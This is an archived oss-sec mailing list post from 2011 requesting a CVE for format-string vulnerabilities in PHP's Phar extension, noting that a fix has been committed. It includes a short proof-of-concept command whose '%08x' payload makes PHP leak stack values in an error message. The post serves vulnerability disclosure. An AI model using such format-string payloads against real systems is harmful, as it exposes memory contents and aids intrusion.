oss-sec mailing list archives

Re: CVE request: format-string vulnerability in PHP Phar extension

From: Felipe Pena <felipensp () gmail com>
Date: Mon, 14 Mar 2011 10:59:04 -0300

2011/3/14 Felipe Pena <felipensp () gmail com>

Hi,
I just found several format-string vulnerability in PHP Phar extension, a
bug has been filed in the PHP bugtracker (private):
http://bugs.php.net/bug.php?id=54247
On error several class methods passes the supplied argument to  zend_throw_exception_ex()
which prints a formatted error message using such value as the formatter
string.

$ sapi/cli/php ../bug.php "%08x.%08x.%08x.%08x.%08x"
PHP Fatal error: Uncaught exception 'PharException' with message 'unable to
open phar for reading "00000008.00000000.bf95c204.0963e050.00000014"' in
/home/felipe/dev/bug.php:4

A fix has been committed for this issue:
http://svn.php.net/viewvc?view=revision&revision=309221

-- 
Regards,
Felipe Pena

Current thread:

CVE request: format-string vulnerability in PHP Phar extension Felipe Pena (Mar 14)
- Re: CVE request: format-string vulnerability in PHP Phar extension Felipe Pena (Mar 14)
- Re: CVE request: format-string vulnerability in PHP Phar extension Josh Bressers (Mar 14)